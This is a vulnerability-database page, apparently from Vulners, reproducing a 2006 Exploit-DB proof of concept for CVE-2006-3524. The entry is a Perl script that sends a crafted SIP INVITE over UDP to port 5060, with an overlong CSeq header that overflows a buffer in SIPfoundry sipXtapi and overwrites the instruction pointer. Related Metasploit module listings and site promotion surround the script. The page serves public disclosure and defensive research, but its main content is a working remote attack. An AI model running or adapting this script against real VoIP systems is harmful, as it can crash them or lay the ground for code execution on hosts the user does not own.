Lucene search
+L

SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)

🗓️ 10 Jul 2006 00:00:00Reported by Michael ThumannType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 54 Views

Remote Buffer Overflow in sipXtapi PoC Exploi

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2006-3524
12 Jul 200600:05
attackerkb
circl
Circl
CVE-2006-3524
15 Jun 201000:00
circl
cve
CVE
CVE-2006-3524
12 Jul 200600:00
cve
cvelist
Cvelist
CVE-2006-3524
12 Jul 200600:00
cvelist
exploitdb
Exploit DB
SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)
15 Jun 201000:00
exploitdb
exploitdb
Exploit DB
SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)
15 Jun 201000:00
exploitdb
exploitdb
Exploit DB
AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)
15 Jun 201000:00
exploitdb
metasploit
Metasploit
AIM Triton 1.0.4 CSeq Buffer Overflow
2 Nov 200601:16
metasploit
metasploit
Metasploit
SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
13 Sep 200606:20
metasploit
metasploit
Metasploit
SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
1 Nov 200612:14
metasploit
Rows per page
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;


print "sipXtapi Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>\n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";

#EoF

# milw0rm.com [2006-07-10]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jul 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.67509
54